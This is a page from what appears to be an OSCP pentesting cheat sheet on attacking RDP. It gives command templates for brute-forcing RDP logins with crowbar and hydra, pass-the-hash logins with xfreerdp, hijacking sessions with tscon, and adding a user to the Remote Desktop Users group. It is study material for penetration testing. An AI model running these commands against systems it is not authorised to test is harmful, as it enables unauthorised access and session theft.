ðŸŦĨ
OSCP Port Scanning
  • ðŸĪŊOSCP Port Scanning
  • 😍About us
  • 😇Enumeration
  • ðŸĪĐPort 21 (FTP)
  • 😜Port 22 (SSH)
  • 😆Port 23 (TELNET)
  • 😆Port 53 (DNS)
  • 🙃Port 79 (FINGER)
  • 😋Port 80-443 (http / https)
  • 😆Port 88 (KERBEROS )
  • ðŸĨđPort 110-25-143 (pop3/smtp)
  • ðŸĨđPort 161-169 (SNMP)
  • 🙃Port 389 (LDAP)
  • ðŸĨļPort 138-139-445 (SMB/netbios)
  • ðŸŦĒPort 1433 (MSSQL)
  • 😎Port 111-2049 (RPC/NFS)
  • 😛Port 3306 (MYSQL)
  • 😛Port 5432 (PostgreSQL)
  • 😛Port 12017-27018 (MONGODB)
  • ðŸĨģPort 3389 (RDP)
  • ðŸĪŠPort 5800 - 58001 - 5900 - 5901 (VNC)
  • 😋Port 5985 - 5986 (WINRM)
  • 😋Port Knocking
  • 😍Compiling exploits
  • ðŸĨ°Thankyou
Powered by GitBook
On this page

Port 3389 (RDP)

Brute force

crowbar -b rdp -s <IP>/CIDR -u <USER> -C <PASSWORDS_LIST>
crowbar -b rdp -s <IP>/CIDR -U <USERS_LIST> -C <PASSWORDS_LIST>

hydra -f -L <USERS_LIST> -P <PASSWORDS_LIST> rdp://<IP> -u -vV

Connect with known credentials / hash

rdesktop -u <USERNAME> <IP>
rdesktop -d <DOMAIN> -u <USERNAME> -p <PASSWORD> <IP>

xfreerdp /u:[DOMAIN\]<USERNAME> /p:<PASSWORD> /v:<IP>
xfreerdp /u:[DOMAIN\]<USERNAME> /pth:<HASH> /v:<IP>

Session stealing

Get openned sessions

query user

Access to the selected

tscon <ID> /dest:<SESSIONNAME>

Adding user to RDP group (Windows)

net localgroup "Remote Desktop Users" <USER> /add
PreviousPort 12017-27018 (MONGODB)NextPort 5800 - 58001 - 5900 - 5901 (VNC)

Last updated 11 months ago

ðŸĨģ